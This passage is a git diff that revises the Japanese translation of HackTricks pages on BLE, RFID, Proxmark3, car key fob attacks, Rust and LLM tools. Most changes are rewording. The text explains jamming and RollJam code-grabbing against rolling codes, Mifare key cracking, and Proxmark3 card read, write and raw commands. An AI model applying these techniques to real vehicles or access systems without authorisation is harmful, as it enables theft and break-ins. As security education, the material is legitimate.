+リスニングデバイス、別名セントラルデバイスは、広告デバイスに特に送信された**SCANリクエスト**で広告パケットに応答できます。そのスキャンへの**応答**は、完全なデバイス名など、最初の広告リクエストに収まらなかった追加情報を含む**広告**パケットと同じ構造を使用します。
 
 ![](<../../images/image (152).png>)
 
-プレアンブルバイトは周波数を同期させ、4バイトのアクセスアドレスは**接続識別子**であり、複数のデバイスが同じチャネルで接続を確立しようとするシナリオで使用されます。次に、プロトコルデータユニット（**PDU**）は**広告データ**を含みます。PDUにはいくつかのタイプがあり、最も一般的に使用されるのはADV_NONCONN_INDとADV_INDです。デバイスは**接続を受け入れない**場合、**ADV_NONCONN_IND** PDUタイプを使用し、広告パケット内でのみデータを送信します。デバイスは**接続を許可する**場合、**ADV_IND**を使用し、**接続**が**確立**されると広告パケットの送信を停止します。
+プレアンブルバイトは周波数を同期させ、4バイトのアクセスアドレスは**接続識別子**であり、複数のデバイスが同じチャネルで接続を確立しようとするシナリオで使用されます。次に、プロトコルデータユニット（**PDU**）は**広告データ**を含みます。PDUにはいくつかのタイプがあり、最も一般的に使用されるのはADV_NONCONN_INDとADV_INDです。デバイスは**接続を受け入れない**場合、**ADV_NONCONN_IND** PDUタイプを使用し、広告パケット内でのみデータを送信します。デバイスは**接続を許可する**場合、**ADV_IND**を使用し、**接続**が**確立**されると広告パケットの送信を**停止**します。
 
 ### GATT
 
-**汎用属性プロファイル**（GATT）は、**デバイスがデータをフォーマットし転送する方法**を定義します。BLEデバイスの攻撃面を分析する際、GATT（またはGATTs）に注意を集中させることが多いです。なぜなら、それが**デバイス機能をトリガーする方法**であり、データが保存、グループ化、変更される方法だからです。GATTは、デバイスの特性、記述子、およびサービスを16ビットまたは32ビットの値として表形式でリストします。**特性**は、セントラルデバイスと周辺デバイス間で**送信される**データ値です。これらの特性には、**追加情報を提供する**記述子がある場合があります。**特性**は、特定のアクションを実行することに関連している場合、**サービス**に**グループ化**されることがよくあります。
+**汎用属性プロファイル**（GATT）は、**デバイスがデータをフォーマットし転送する方法**を定義します。BLEデバイスの攻撃面を分析する際、GATT（またはGATTs）に注意を集中させることがよくあります。なぜなら、それが**デバイス機能をトリガーする方法**であり、データが保存、グループ化、変更される方法だからです。GATTは、デバイスの特性、記述子、およびサービスを16ビットまたは32ビットの値として表形式でリストします。**特性**は、セントラルデバイスと周辺デバイス間で**送信される**データ値です。これらの特性には、**追加情報を提供する**記述子がある場合があります。**特性**は、特定のアクションを実行することに関連している場合、**サービス**に**グループ化**されることがよくあります。
 
 ## Enumeration
 ```bash
diff --git a/src/todo/radio-hacking/pentesting-rfid.md b/src/todo/radio-hacking/pentesting-rfid.md
index 52f94af97..167c2baa7 100644
--- a/src/todo/radio-hacking/pentesting-rfid.md
+++ b/src/todo/radio-hacking/pentesting-rfid.md
@@ -4,20 +4,20 @@
 
 ## Introduction
 
-**Radio Frequency Identification (RFID)**は、最も人気のある短距離無線ソリューションです。通常、エンティティを識別する情報を保存および送信するために使用されます。
+**Radio Frequency Identification (RFID)**は、最も一般的な短距離無線ソリューションです。通常、エンティティを識別する情報を保存および送信するために使用されます。
 
-RFIDタグは、**独自の電源（アクティブ）**、例えば埋め込まれたバッテリーに依存するか、受信した無線波からの**誘導電流**を使用して読み取りアンテナから電力を受け取ります（**パッシブ**）。
+RFIDタグは、**独自の電源（アクティブ）**、例えば埋め込まれたバッテリーに依存するか、受信した無線波から誘導された電流を使用して読み取りアンテナから電力を受け取ります（**パッシブ**）。
 
 ### Classes
 
 EPCglobalはRFIDタグを6つのカテゴリに分けています。各カテゴリのタグは、前のカテゴリにリストされたすべての機能を持ち、後方互換性があります。
 
 - **Class 0**タグは、**UHF**バンドで動作する**パッシブ**タグです。ベンダーが製造工場で**事前にプログラム**します。その結果、メモリに保存された情報を**変更することはできません**。
-- **Class 1**タグは、**HF**バンドでも動作できます。さらに、製造後に**一度だけ書き込むことができます**。多くのClass 1タグは、受信したコマンドの**循環冗長検査**（CRC）を処理することもできます。CRCは、エラー検出のためのコマンドの最後にあるいくつかの追加バイトです。
+- **Class 1**タグも**HF**バンドで動作できます。さらに、製造後に**一度だけ書き込むことができます**。多くのClass 1タグは、受信したコマンドの**循環冗長検査**（CRC）を処理することもできます。CRCは、エラー検出のためのコマンドの最後にあるいくつかの追加バイトです。
 - **Class 2**タグは、**複数回書き込むことができます**。
 - **Class 3**タグは、現在の温度やタグの動きなどの環境パラメータを記録できる**埋め込みセンサー**を含むことができます。これらのタグは**セミパッシブ**であり、埋め込まれた電源（統合された**バッテリー**など）を持っていますが、他のタグやリーダーとの無線**通信を開始することはできません**。
 - **Class 4**タグは、同じクラスの他のタグとの通信を開始できるため、**アクティブタグ**です。
-- **Class 5**タグは、**他のタグに電力を供給し、すべての前のタグ**クラスと通信できます。Class 5タグは**RFIDリーダー**として機能できます。
+- **Class 5**タグは、他のタグに**電力を供給し、すべての前のタグ**クラスと通信できます。Class 5タグは**RFIDリーダー**として機能できます。
 
 ### Information Stored in RFID Tags
 
@@ -25,7 +25,7 @@ RFIDタグのメモリは通常、4種類のデータを保存します：**識
 
 ISO標準は、タグが属する**オブジェクトの種類**を示すコードであるアプリケーションファミリー識別子（**AFI**）値を指定します。ISOによって指定されたもう1つの重要なレジスタは、ユーザーデータの**論理的な組織**を定義するデータストレージフォーマット識別子（**DSFID**）です。
 
-ほとんどのRFID **セキュリティ制御**には、各ユーザーメモリブロックおよびAFIおよびDSFID値を含む特別なレジスタに対する**読み取り**または**書き込み**操作を**制限**するメカニズムがあります。これらの**ロック****メカニズム**は、制御メモリに保存されたデータを使用し、ベンダーによって事前に構成された**デフォルトパスワード**を持っていますが、タグの所有者が**カスタムパスワードを構成する**ことを許可します。
+ほとんどのRFID **セキュリティコントロール**には、各ユーザーメモリブロックおよびAFIおよびDSFID値を含む特別なレジスタに対する**読み取り**または**書き込み**操作を**制限**するメカニズムがあります。これらの**ロック****メカニズム**は、制御メモリに保存されたデータを使用し、ベンダーによって事前に構成された**デフォルトパスワード**を持っていますが、タグの所有者が**カスタムパスワードを構成する**ことを許可します。
 
 ### Low & High frequency tags comparison
 
@@ -33,19 +33,19 @@ ISO標準は、タグが属する**オブジェクトの種類**を示すコー
 
 ## Low-Frequency RFID Tags (125kHz)
 
-**低周波タグ**は、**高いセキュリティを必要としない**システムでよく使用されます：建物のアクセス、インターホンキー、ジムの会員カードなど。より高い範囲のため、支払い駐車場での使用に便利です：ドライバーはカードをリーダーに近づける必要がなく、遠くからトリガーされます。同時に、低周波タグは非常に原始的で、データ転送速度が低いため、残高管理や暗号化などの複雑な双方向データ転送を実装することは不可能です。低周波タグは、認証手段なしで短いIDを送信するだけです。
+**低周波タグ**は、**高いセキュリティを必要としない**システムでよく使用されます：建物のアクセス、インターホンキー、ジムの会員カードなど。より高い範囲のため、支払い駐車場での使用に便利です：ドライバーはカードをリーダーに近づける必要がなく、遠くからトリガーされます。同時に、低周波タグは非常に原始的で、データ転送速度が低いため、残高保持や暗号化などの複雑な双方向データ転送を実装することは不可能です。低周波タグは、認証手段なしで短いIDを送信するだけです。
 
 これらのデバイスは**パッシブ****RFID**技術に依存し、**30 kHzから300 kHzの範囲**で動作しますが、125 kHzから134 kHzを使用するのが一般的です：
 
 - **ロングレンジ** — 低い周波数は高い範囲に変換されます。EM-MarinやHIDリーダーの中には、1メートルの距離から動作するものがあります。これらは駐車場でよく使用されます。
-- **原始的なプロトコル** — 低いデータ転送速度のため、これらのタグは短いIDしか送信できません。ほとんどの場合、データは認証されず、保護されていません。カードがリーダーの範囲に入ると、ただIDを送信し始めます。
+- **原始的なプロトコル** — 低いデータ転送速度のため、これらのタグは短いIDを送信することしかできません。ほとんどの場合、データは認証されず、保護されていません。カードがリーダーの範囲内に入ると、ただIDを送信し始めます。
 - **低いセキュリティ** — これらのカードは簡単にコピーでき、プロトコルの原始性のために他の人のポケットからでも読み取られる可能性があります。
 
 **人気のある125 kHzプロトコル：**
 
-- **EM-Marin** — EM4100、EM4102。CISで最も人気のあるプロトコル。シンプルさと安定性のため、約1メートルから読み取ることができます。
-- **HID Prox II** — HID Globalによって導入された低周波プロトコル。このプロトコルは西洋諸国でより人気があります。より複雑で、このプロトコルのカードとリーダーは比較的高価です。
-- **Indala** — Motorolaによって導入され、後にHIDに買収された非常に古い低周波プロトコル。前の2つと比べて、使用されることは少なくなっています。
+- **EM-Marin** — EM4100、EM4102。CISで最も人気のあるプロトコル。シンプルさと安定性のため、約1メートルの距離から読み取ることができます。
+- **HID Prox II** — HID Globalによって導入された低周波プロトコル。このプロトコルは西洋諸国でより人気があります。より複雑で、このプロトコル用のカードとリーダーは比較的高価です。
+- **Indala** — Motorolaによって導入された非常に古い低周波プロトコルで、後にHIDに買収されました。前の2つと比較して、使用されることは少なくなっています。
 
 実際には、もっと多くの低周波プロトコルがあります。しかし、すべて同じ物理層の変調を使用し、上記のもののいずれかのバリエーションと見なすことができます。
 
@@ -66,13 +66,13 @@ flipper-zero/fz-125khz-rfid.md
 
 <figure><img src="../../images/image (930).png" alt=""><figcaption></figcaption></figure>
 
-簡単に言えば、NFCのアーキテクチャは次のように機能します：送信プロトコルはカードを製造する会社によって選択され、低レベルのISO 14443に基づいて実装されます。例えば、NXPはMifareという独自の高レベル送信プロトコルを発明しました。しかし、低レベルでは、MifareカードはISO 14443-A標準に基づいています。
+簡単に言えば、NFCのアーキテクチャは次のように機能します：送信プロトコルはカードを製造する会社によって選択され、低レベルのISO 14443に基づいて実装されます。例えば、NXPはMifareと呼ばれる独自の高レベル送信プロトコルを発明しました。しかし、低レベルでは、MifareカードはISO 14443-A標準に基づいています。
 
-Flipperは、低レベルのISO 14443プロトコルとMifare Ultralightデータ転送プロトコルおよび銀行カードで使用されるEMVと相互作用できます。Mifare ClassicとNFC NDEFのサポートを追加する作業を進めています。NFCを構成するプロトコルと標準についての詳細な考察は、別の記事にする価値があります。
+Flipperは、低レベルのISO 14443プロトコルとMifare Ultralightデータ転送プロトコルおよび銀行カードで使用されるEMVと相互作用できます。Mifare ClassicおよびNFC NDEFのサポートを追加する作業を進めています。NFCを構成するプロトコルと標準についての詳細な検討は、別の記事に値するものであり、後で公開する予定です。
 
 ISO 14443-A標準に基づくすべての高周波カードにはユニークなチップIDがあります。これはカードのシリアル番号として機能し、ネットワークカードのMACアドレスのようなものです。**通常、UIDは4または7バイトの長さですが、まれに**10バイトまで**行くことがあります。UIDは秘密ではなく、簡単に読み取ることができ、**時にはカード自体に印刷されていることもあります**。
 
-UIDに依存して**認証とアクセスを許可する**アクセス制御システムが多数あります。時には、RFIDタグが**暗号化をサポートしている**場合でも、これが発生します。このような**誤用**は、セキュリティの観点から、愚かな**125 kHzカード**のレベルにまで引き下げます。仮想カード（Apple Payなど）は、電話の所有者が支払いアプリでドアを開けないようにするために動的UIDを使用します。
+UIDに依存して**認証およびアクセスを許可する**アクセス制御システムが多数あります。時には、RFIDタグが**暗号化をサポートしている**場合でも、これが発生します。このような**誤用**は、セキュリティの観点から、愚かな**125 kHzカード**のレベルにまで引き下げます。仮想カード（Apple Payなど）は、動的UIDを使用して、電話の所有者が支払いアプリでドアを開けることがないようにします。
 
 - **低い範囲** — 高周波カードは、リーダーの近くに置かなければならないように特別に設計されています。これにより、カードが不正な相互作用から保護されます。私たちが達成した最大の読み取り範囲は約15 cmで、これはカスタムメイドの高範囲リーダーを使用した場合です。
 - **高度なプロトコル** — データ転送速度が424 kbpsまで可能で、完全な双方向データ転送を伴う複雑なプロトコルを可能にします。これにより、**暗号化**、データ転送などが可能になります。
diff --git a/src/todo/radio-hacking/proxmark-3.md b/src/todo/radio-hacking/proxmark-3.md
index 67cdd2063..f8c2708df 100644
--- a/src/todo/radio-hacking/proxmark-3.md
+++ b/src/todo/radio-hacking/proxmark-3.md
@@ -31,11 +31,11 @@ proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to
 proxmark3> hf mf eget 01 # Read block 1
 proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
 ```
-Proxmark3は、**タグとリーダー間の通信を傍受**して機密データを探すなど、他のアクションを実行することができます。このカードでは、通信をスニッフィングし、使用されているキーを計算することができます。なぜなら、**使用される暗号操作が弱いため**、平文と暗号文を知っていれば計算できるからです（`mfkey64`ツール）。
+Proxmark3は、**タグとリーダー間の通信を盗聴**して機密データを探すなど、他のアクションを実行することができます。このカードでは、通信をスニッフィングし、使用されているキーを計算することができます。なぜなら、**使用される暗号操作が弱いため**、平文と暗号文を知っていれば計算できるからです（`mfkey64`ツール）。
 
 ### 生のコマンド
 
-IoTシステムは時々**ブランドなしまたは商業用でないタグ**を使用します。この場合、Proxmark3を使用してタグにカスタム**生のコマンドを送信**することができます。
+IoTシステムは時々、**ブランドのないまたは商業用でないタグ**を使用します。この場合、Proxmark3を使用してタグにカスタム**生のコマンドを送信**することができます。
 ```bash
 proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
 SAK : 08 [2]
@@ -45,7 +45,7 @@ No chinese magic backdoor command detected
 Prng detection: WEAK
 Valid ISO14443A Tag Found - Quiting Search
 ```
-この情報を使って、カードに関する情報やそれとの通信方法を調べることができます。Proxmark3は、次のような生のコマンドを送信することを可能にします: `hf 14a raw -p -b 7 26`
+この情報を使って、カードに関する情報やそれとの通信方法を検索することができます。Proxmark3は、次のような生のコマンドを送信することを可能にします: `hf 14a raw -p -b 7 26`
 
 ### スクリプト
 
diff --git a/src/todo/radio-hacking/sub-ghz-rf.md b/src/todo/radio-hacking/sub-ghz-rf.md
index 59bae0f78..ab51ded86 100644
--- a/src/todo/radio-hacking/sub-ghz-rf.md
+++ b/src/todo/radio-hacking/sub-ghz-rf.md
@@ -8,7 +8,7 @@
 
 ## 車のドア
 
-ほとんどの車のキーフォブは、**315 MHzまたは433 MHz**のいずれかで動作します。これらはどちらも無線周波数であり、さまざまなアプリケーションで使用されます。2つの周波数の主な違いは、433 MHzの方が315 MHzよりも範囲が長いことです。これは、433 MHzがリモートキーなしのエントリーなど、より長い範囲を必要とするアプリケーションに適していることを意味します。\
+ほとんどの車のキーフォブは、**315 MHzまたは433 MHz**のいずれかで動作します。これらはどちらも無線周波数であり、さまざまな異なるアプリケーションで使用されます。2つの周波数の主な違いは、433 MHzの方が315 MHzよりも範囲が長いことです。これは、433 MHzがリモートキーなしのエントリーなど、より長い範囲を必要とするアプリケーションに適していることを意味します。\
 ヨーロッパでは433.92MHzが一般的に使用されており、米国と日本では315MHzです。
 
 ## **ブルートフォース攻撃**
@@ -21,7 +21,7 @@
 
 信号間の**2 msの待機**時間を**削除**すると、**時間を3分に短縮**できます。
 
-さらに、De Bruijn Sequenceを使用することで（ブルートフォースするために必要なすべての潜在的なバイナリ番号を送信するために必要なビット数を減らす方法）、この**時間はわずか8秒に短縮**されます：
+さらに、De Bruijn Sequenceを使用することで（ブルートフォースするためにすべての潜在的なバイナリ番号を送信するのに必要なビット数を減らす方法）、この**時間はわずか8秒に短縮**されます：
 
 <figure><img src="../../images/image (583).png" alt=""><figcaption></figcaption></figure>
 
@@ -45,7 +45,7 @@ flipper-zero/fz-sub-ghz.md
 
 **RF信号は通常、ロールコードを使用して送信され**、これは使用するたびにコードが変わることを意味します。これにより、誰かが信号を**傍受**し、ガレージに**不正アクセス**するために**使用**することが**難しく**なります。
 
-ロールコードシステムでは、リモコンとガレージドアオープナーは**共有アルゴリズム**を持ち、リモコンが使用されるたびに**新しいコードを生成**します。ガレージドアオープナーは**正しいコード**にのみ反応し、コードをキャプチャするだけで不正アクセスを得ることが非常に難しくなります。
+ロールコードシステムでは、リモコンとガレージドアオープナーは**共有アルゴリズム**を持ち、リモコンが使用されるたびに**新しいコードを生成**します。ガレージドアオープナーは**正しいコード**にのみ反応し、コードをキャプチャするだけでガレージに不正アクセスすることが非常に難しくなります。
 
 ### **ミッシングリンク攻撃**
 
@@ -53,9 +53,9 @@ flipper-zero/fz-sub-ghz.md
 
 ### フルリンクジャミング攻撃
 
-攻撃者は、**車両または受信機の近くで信号をジャミング**することができ、**受信機が実際にコードを「聞く」ことができなくなります**。その状態になると、単に**コードをキャプチャして再生**できます。
+攻撃者は、**車両または受信機の近くで信号をジャミング**することができ、**受信機が実際にコードを「聞く」ことができなくなります**。その状態になると、単に**コードをキャプチャしてリプレイ**できます。
 
-被害者はある時点で**鍵を使って車をロック**しますが、その後攻撃者は**「ドアを閉める」コードを十分に記録**し、ドアを開けるために再送信できることを期待します（**周波数の変更が必要な場合があります**。同じコードを使用して開閉する車があり、異なる周波数で両方のコマンドを聞くためです）。
+被害者はある時点で**鍵を使って車をロック**しますが、その後攻撃者は**「ドアを閉める」コードを十分に記録**して、ドアを開けるために再送信できることを期待します（**周波数の変更が必要な場合があります**。同じコードを使用して開閉する車があり、異なる周波数で両方のコマンドを聞くためです）。
 
 > [!WARNING]
 > **ジャミングは機能します**が、目立ちます。**車をロックする人が単にドアをテスト**してロックされていることを確認すると、車がロックされていないことに気付くでしょう。さらに、彼らがそのような攻撃を認識している場合、ドアがロックする**音**が鳴らなかったり、ロックボタンを押したときに車の**ライト**が点滅しなかったことを聞くことができるかもしれません。
@@ -63,7 +63,7 @@ flipper-zero/fz-sub-ghz.md
 ### **コードグラビング攻撃（別名「ロールジャム」）**
 
 これはより**ステルスジャミング技術**です。攻撃者は信号をジャミングし、被害者がドアをロックしようとすると機能しませんが、攻撃者は**このコードを記録**します。その後、被害者はボタンを押して再度車をロックしようとし、車は**この2番目のコードを記録**します。\
-この後すぐに、**攻撃者は最初のコードを送信**し、**車はロックされます**（被害者は2回目の押下で閉じたと思うでしょう）。その後、攻撃者は**盗まれた2番目のコードを送信して車を開ける**ことができます（**「車を閉める」コードも使用できると仮定します**）。周波数の変更が必要な場合があります（同じコードを使用して開閉する車があり、異なる周波数で両方のコマンドを聞くためです）。
+この後すぐに、**攻撃者は最初のコードを送信**し、**車はロックされます**（被害者は2回目の押下で閉じたと思うでしょう）。その後、攻撃者は**盗まれた2番目のコードを送信して車を開ける**ことができます（**「車を閉じる」コードも使用できると仮定します**）。周波数の変更が必要な場合があります（同じコードを使用して開閉する車があり、異なる周波数で両方のコマンドを聞くためです）。
 
 攻撃者は**車の受信機をジャミングし、自分の受信機をジャミングしない**ことができます。なぜなら、車の受信機が例えば1MHzの広帯域で聞いている場合、攻撃者はリモコンが使用する正確な周波数を**ジャミング**するのではなく、**そのスペクトル内の近い周波数をジャミング**し、**攻撃者の受信機はより小さな範囲でリモコン信号を**ジャミング信号なしで聞くことができるからです。
 
@@ -75,7 +75,7 @@ flipper-zero/fz-sub-ghz.md
 
 ### アラーム音ジャミング攻撃
 
-車にインストールされたアフターマーケットのロールコードシステムに対するテストでは、**同じコードを2回送信**すると、すぐに**アラーム**とイモビライザーが作動し、ユニークな**サービス拒否**の機会を提供しました。皮肉なことに、**アラーム**とイモビライザーを**無効にする手段**は**リモコンを押す**ことであり、攻撃者に**継続的にDoS攻撃を実行する能力**を提供しました。また、被害者が攻撃を早急に止めたいと思うため、**前の攻撃と組み合わせてより多くのコードを取得する**こともできます。
+車に取り付けられたアフターマーケットのロールコードシステムに対するテストでは、**同じコードを2回送信**すると、即座に**アラーム**とイモビライザーが作動し、ユニークな**サービス拒否**の機会を提供しました。皮肉なことに、**アラーム**とイモビライザーを**無効にする手段**は**リモコンを押す**ことであり、攻撃者に**継続的にDoS攻撃を実行する能力**を提供しました。また、被害者が攻撃を早急に止めたいと思うため、**前の攻撃と組み合わせてより多くのコードを取得する**こともできます。
 
 ## 参考文献
 
diff --git a/src/todo/rust-basics.md b/src/todo/rust-basics.md
index df76d213f..dc1656ae4 100644
--- a/src/todo/rust-basics.md
+++ b/src/todo/rust-basics.md
@@ -1,8 +1,8 @@
 # Rust Basics
 
-### ジェネリック型
+### Generic Types
 
-任意の型を持つ値の1つを含む構造体を作成します。
+任意の型を持つことができる値の1つを持つ構造体を作成します。
 ```rust
 struct Wrapper<T> {
 value: T,
@@ -55,7 +55,7 @@ println!("Check out my macro!");
 }
 }
 ```
-### 繰り返す
+### 反復する
 ```rust
 // Iterate through a vector
 let my_fav_fruits = vec!["banana", "raspberry"];
diff --git a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
index 71096807a..c8a41a81a 100644
--- a/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
+++ b/src/todo/stealing-sensitive-information-disclosure-from-a-web.md
@@ -2,7 +2,7 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-もし、あなたのセッションに基づいて機密情報を表示する**ウェブページを見つけた場合**: それはクッキーを反映しているか、印刷またはクレジットカードの詳細やその他の機密情報を表示しているかもしれません。あなたはそれを盗むことを試みることができます。\
+もし、あなたのセッションに基づいて機密情報を表示する**ウェブページを見つけた場合**: それはクッキーを反映しているか、印刷またはクレジットカードの詳細やその他の機密情報を表示しているかもしれません。あなたはそれを盗むことを試みるかもしれません。\
 ここでは、それを達成するために試すことができる主な方法を紹介します:
 
 - [**CORSバイパス**](../pentesting-web/cors-bypass.md): CORSヘッダーをバイパスできれば、悪意のあるページに対してAjaxリクエストを行うことで情報を盗むことができます。
diff --git a/src/todo/test-llms.md b/src/todo/test-llms.md
index 10ffef273..90c4b90a3 100644
--- a/src/todo/test-llms.md
+++ b/src/todo/test-llms.md
@@ -4,7 +4,7 @@
 
 ### [**Hugging Face Transformers**](https://github.com/huggingface/transformers)
 
-Hugging Face Transformersは、GPT、BERTなどのLLMを使用、トレーニング、デプロイするための最も人気のあるオープンソースライブラリの1つです。事前トレーニング済みモデル、データセット、微調整とデプロイメントのためのHugging Face Hubとのシームレスな統合を含む包括的なエコシステムを提供します。
+Hugging Face Transformersは、GPT、BERTなどのLLMを使用、トレーニング、デプロイするための最も人気のあるオープンソースライブラリの1つです。事前トレーニング済みモデル、データセット、微調整とデプロイのためのHugging Face Hubとのシームレスな統合を含む包括的なエコシステムを提供します。
 
 ### [**LangChain**](https://github.com/langchain-ai/langchain)
 
@@ -12,7 +12,7 @@ LangChainは、LLMを使用したアプリケーションを構築するため
 
 ### [**LitGPT**](https://github.com/Lightning-AI/litgpt)
 
-LitGPTは、Lightning AIによって開発されたプロジェクトで、Lightningフレームワークを活用してGPTベースのモデルのトレーニング、微調整、およびデプロイを促進します。他のLightning AIツールとシームレスに統合され、大規模な言語モデルを扱うための最適化されたワークフローを提供します。
+LitGPTは、Lightning AIによって開発されたプロジェクトで、Lightningフレームワークを活用してGPTベースのモデルのトレーニング、微調整、デプロイを促進します。他のLightning AIツールとシームレスに統合され、大規模な言語モデルを扱うための最適化されたワークフローを提供します。
 
 ### [**LitServe**](https://github.com/Lightning-AI/LitServe)
 
@@ -32,7 +32,7 @@ Axolotlは、LLMを含むAIモデルのデプロイ、スケーリング、お
 
 * **Models**: ユーザーがさまざまなタスク（テキスト生成、翻訳、画像認識など）のためにモデルをブラウズ、ダウンロード、統合できる**事前トレーニング済み機械学習モデル**の広範なリポジトリ。
 * **Datasets:** モデルのトレーニングと評価に使用される**データセットの包括的なコレクション**。多様なデータソースへの簡単なアクセスを促進し、ユーザーが特定の機械学習プロジェクトのためにデータを見つけて利用できるようにします。
-* **Spaces:** **インタラクティブな機械学習アプリケーション**やデモをホスティングおよび共有するためのプラットフォーム。開発者が自分のモデルを実際に示し、ユーザーフレンドリーなインターフェースを作成し、ライブデモを共有することで他者とコラボレーションできるようにします。
+* **Spaces:** **インタラクティブな機械学習アプリケーション**やデモをホスティングおよび共有するためのプラットフォーム。開発者は、モデルを実際に動作させて**ショーケース**し、ユーザーフレンドリーなインターフェースを作成し、ライブデモを共有することで他の人とコラボレーションできます。
 
 ## [**TensorFlow Hub**](https://www.tensorflow.org/hub) **&** [**Kaggle**](https://www.kaggle.com/)
 
@@ -46,5 +46,5 @@ Axolotlは、LLMを含むAIモデルのデプロイ、スケーリング、お
 
 **Replicate**は、開発者がシンプルなAPIを介してクラウドで機械学習モデルを実行できるプラットフォームです。広範なインフラストラクチャのセットアップなしでMLモデルを簡単にアクセス可能かつデプロイ可能にすることに焦点を当てています。
 
-* **Models:** コミュニティによって提供された機械学習モデルのリポジトリで、ユーザーがブラウズ、試行、およびモデルをアプリケーションに最小限の労力で統合できます。
+* **Models:** コミュニティによって提供された機械学習モデルのリポジトリで、ユーザーはモデルをブラウズ、試し、最小限の労力でアプリケーションに統合できます。
 * **API Access:** 開発者が自分のアプリケーション内でモデルを簡単にデプロイおよびスケールできるようにするシンプルなAPI。
diff --git a/src/welcome/hacktricks-values-and-faq.md b/src/welcome/hacktricks-values-and-faq.md
index d991ed194..8dc282a3e 100644
--- a/src/welcome/hacktricks-values-and-faq.md
+++ b/src/welcome/hacktricks-values-and-faq.md
@@ -13,9 +13,9 @@
 > - コミュニティが公開する素晴らしい**ハッキング**技術を**保存**し、**元の****著者**にすべての**クレジット**を与えます。
 >   - **他の人からのクレジットは必要ありません**、私たちはただ皆のためにクールなトリックを保存したいだけです。
 >   - 私たちはHackTricksで**自分たちの研究**も書きます。
->   - いくつかのケースでは、**HackTricksに技術の重要な部分の要約を書き**、**詳細については元の投稿を訪れることを勧めます**。
+>   - いくつかのケースでは、**HackTricksに技術の重要な部分の要約を書き**、**詳細については元の投稿を訪れることを読者に勧めます**。
 > - 本の中のすべてのハッキング技術を**整理**して、**よりアクセスしやすく**します。
->   - HackTricksチームは、人々が**より早く学べるように**コンテンツを**整理するためだけに**数千時間を無料で捧げました。
+>   - HackTricksチームは、人々が**より早く学べるように**コンテンツを**整理するためだけに**何千時間も無料で捧げてきました。
 
 <figure><img src="../images/hack tricks gif.gif" alt="" width="375"><figcaption></figcaption></figure>
 
@@ -25,26 +25,26 @@
 >
 > - **これらのリソースに感謝します、どうやってお礼を言えますか？**
 
-HackTricksチームに感謝の意を表すには、[**@hacktricks_live**](https://twitter.com/hacktricks_live)をメンションしてツイートすることができます。\
+HackTricksチームに感謝の意を表するには、[**@hacktricks_live**](https://twitter.com/hacktricks_live)をメンションしてツイートすることができます。\
 特に感謝している場合は、[**ここでプロジェクトを支援することもできます**](https://github.com/sponsors/carlospolop)。\
-そして、**Githubプロジェクトにスターを付けるのを忘れないでください！**（リンクは下にあります）。
+そして、**Githubプロジェクトに星を付けるのを忘れないでください！**（リンクは下にあります）。
 
 > [!TIP]
 >
 > - **プロジェクトにどのように貢献できますか？**
 
-新しいヒントやトリックをコミュニティと共有したり、本の中で見つけたバグを修正したりすることができます。該当するGithubページに**プルリクエスト**を送信してください：
+新しいヒントやトリックをコミュニティと**共有するか、書籍で見つけたバグを修正**することができます。該当するGithubページに**プルリクエスト**を送信してください：
 
 - [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks)
 - [https://github.com/carlospolop/hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)
 
-**Githubプロジェクトにスターを付けるのを忘れないでください！**
+**Githubプロジェクトに星を付けるのを忘れないでください！**
 
 > [!TIP]
 >
 > - **HackTricksのコンテンツをコピーして自分のブログに載せてもいいですか？**
 
-はい、できますが、**コンテンツがどこから取られたかの特定のリンクを忘れずに言及してください**。
+はい、できますが、**コンテンツがどの特定のリンクから取られたかを忘れずに言及してください**。
 
 > [!TIP]
 >
@@ -66,23 +66,23 @@ url = {\url{https://book.hacktricks.xyz/specific-page}},
 
 **私はそうしたくありません**。それは**誰にも利益をもたらさない**でしょう。すべての**コンテンツはすでに公式のHackTricks書籍で無料で公開されています**。
 
-消えてしまうのが心配なら、Githubでフォークするか、ダウンロードしてください。すでに無料ですから。
+消えてしまうのが心配な場合は、Githubでフォークするか、ダウンロードしてください。すでに無料ですから。
 
 > [!WARNING]
 >
 > - **なぜスポンサーがいるのですか？HackTricks書籍は商業目的ですか？**
 
-最初の**HackTricks**の**価値**は、**全世界に**向けて**無料の**ハッキング教育リソースを提供することです。HackTricksチームはこのコンテンツを提供するために**何千時間も**捧げてきました。再度、**無料**です。
+最初の**HackTricks**の**価値**は、**全世界に**向けて**無料**のハッキング教育リソースを提供することです。HackTricksチームはこのコンテンツを提供するために**何千時間も**捧げてきました。再度、**無料**です。
 
 HackTricks書籍が**商業目的**で作られていると思うなら、あなたは**完全に間違っています**。
 
-私たちはスポンサーがいるのは、すべてのコンテンツが無料であっても、**コミュニティが私たちの仕事を評価する可能性を提供したい**からです。したがって、私たちは人々に[**Githubスポンサー**](https://github.com/sponsors/carlospolop)を通じてHackTricksに寄付するオプションを提供し、**関連するサイバーセキュリティ企業**にHackTricksをスポンサーしてもらい、**広告を掲載する**ことを許可しています。広告は常に**目立つ**場所に配置されますが、**学習**プロセスを妨げないようにしています。
+私たちはスポンサーがいるのは、すべてのコンテンツが無料であっても、**コミュニティが私たちの仕事を評価する機会を提供したい**からです。したがって、私たちは人々に[**Githubスポンサー**](https://github.com/sponsors/carlospolop)を通じてHackTricksに寄付するオプションを提供し、**関連するサイバーセキュリティ企業**にHackTricksをスポンサーしてもらい、**広告を掲載する**ことを許可しています。広告は常に**目立つ**場所に配置されますが、**学習**プロセスを妨げないようにしています。
 
 HackTricksは、HackTricksよりもはるかに少ないコンテンツを持つ他のブログのように、煩わしい広告で溢れていることはありません。なぜなら、HackTricksは商業目的で作られていないからです。
 
 > [!CAUTION]
 >
-> - **HackTricksのページが私のブログ投稿に基づいているが、参照されていない場合はどうすればよいですか？**
+> - **私のブログ投稿に基づいているが参照されていないHackTricksのページを見つけたらどうすればよいですか？**
 
 **申し訳ありません。これは起こるべきではありません**。HackTricksのページのリンクとあなたのブログのリンクをGithubの問題、Twitter、Discordなどでお知らせください。**私たちはそれを確認し、できるだけ早く追加します**。
 
@@ -94,15 +94,15 @@ HackTricksにあなたのページへのリンクがあることは：
 
